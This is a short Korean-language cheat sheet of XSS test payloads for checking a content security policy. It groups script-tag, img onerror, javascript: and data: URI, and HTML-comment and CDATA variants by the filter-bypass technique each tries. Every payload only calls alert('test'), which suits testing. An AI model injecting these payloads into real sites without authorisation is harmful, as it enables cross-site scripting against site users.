CSP 콘텐츠 보안정책
xss테스트
테스트 방법
<script>alert('test');</script>
<img src=x onerror=alert('test')>
<a href="javascript:alert('test')">Click me</a>
--------------------------------------------------------
이스케이프(escaping) 우회 시도
<scr\ipt>alert('test');</scr\ipt>
<img src=x onerror=alert('test')>
<a href="javascript:alert('test')">Click me</a>
--------------------------------------------------------
이벤트 핸들러 우회 시도
<img src=x onerror=alert('test')>
<img src=x onerror="alert('test')">
<img src=x onerror=alert\('test'\)>
--------------------------------------------------------
HTML 주석을 이용한 우회 시도
<!--<img src=x onerror=alert('test')>-->
<!--><img src=x onerror=alert('test')><!-->
<![CDATA[<script>alert('test');</script>]]>
--------------------------------------------------------
스크립트 블록을 이용한 우회 시도:
<img src=x onerror="javascript:alert('test')">
<img src=x onerror="data:text/html,<script>alert('test');</script>">